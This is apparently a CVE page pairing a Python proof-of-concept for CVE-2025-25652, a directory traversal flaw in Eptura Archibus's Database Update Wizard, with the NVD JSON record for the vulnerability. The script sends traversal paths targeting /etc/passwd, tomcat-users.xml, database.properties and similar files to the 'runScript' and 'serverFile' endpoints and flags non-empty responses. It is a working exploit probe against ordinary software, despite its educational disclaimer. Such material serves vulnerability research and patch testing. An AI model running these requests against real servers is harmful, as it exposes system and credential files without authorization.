CVE-2025-25652

#!/usr/bin/env python3 """ CVE-2025-25652 PoC - Eptura Archibus Directory Traversal Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys TARGET_URL = "http://target-server.com/archibus/" def test_directory_traversal(): """Test for directory traversal vulnerability in Database Update Wizard""" # Common sensitive files to test test_paths = [ "../../../etc/passwd", "..\..\..\windows\system32\drivers\etc\hosts", "../../../web.xml", "../../../tomcat-users.xml", "../../../database.properties" ] # Test Run Script component run_script_url = TARGET_URL + "dbupdate/runScript" # Test Server File component server_file_url = TARGET_URL + "dbupdate/serverFile" print("[*] Testing CVE-2025-25652 Directory Traversal...") print(f"[*] Target: {TARGET_URL}") for path in test_paths: # Test Run Script endpoint params = {"scriptPath": path} try: response = requests.get(run_script_url, params=params, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[!] Potential vulnerability found at Run Script with path: {path}") print(f" Response length: {len(response.content)} bytes") except requests.RequestException as e: print(f"[-] Request failed for Run Script: {e}") # Test Server File endpoint params = {"filePath": path} try: response = requests.get(server_file_url, params=params, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[!] Potential vulnerability found at Server File with path: {path}") print(f" Response length: {len(response.content)} bytes") except requests.RequestException as e: print(f"[-] Request failed for Server File: {e}") if __name__ == "__main__": test_directory_traversal()

{"cve": {"id": "CVE-2025-25652", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:57.070", "lastModified": "2026-02-13T21:03:16.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eptura Archibus 2024.03.01.109, the \"Run script\" and \"Server File\" components of the \"Database Update Wizard\" are vulnerable to directory traversal."}, {"lang": "es", "value": "En Eptura Archibus 2024.03.01.109, los componentes 'Run script' y 'Server File' del 'Asistente de actualización de base de datos' son vulnerables a salto de directorio."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eptura:archibus:2024.03.01.109:*:*:*:*:*:*:*", "matchCriteriaId": "22B635E8-316B-4F53-ACDE-9E56785CFE1F"}]}]}], "references": [{"url": "https://eptura.com/our-platform/archibus/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://packetstorm.news/files/id/213675", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}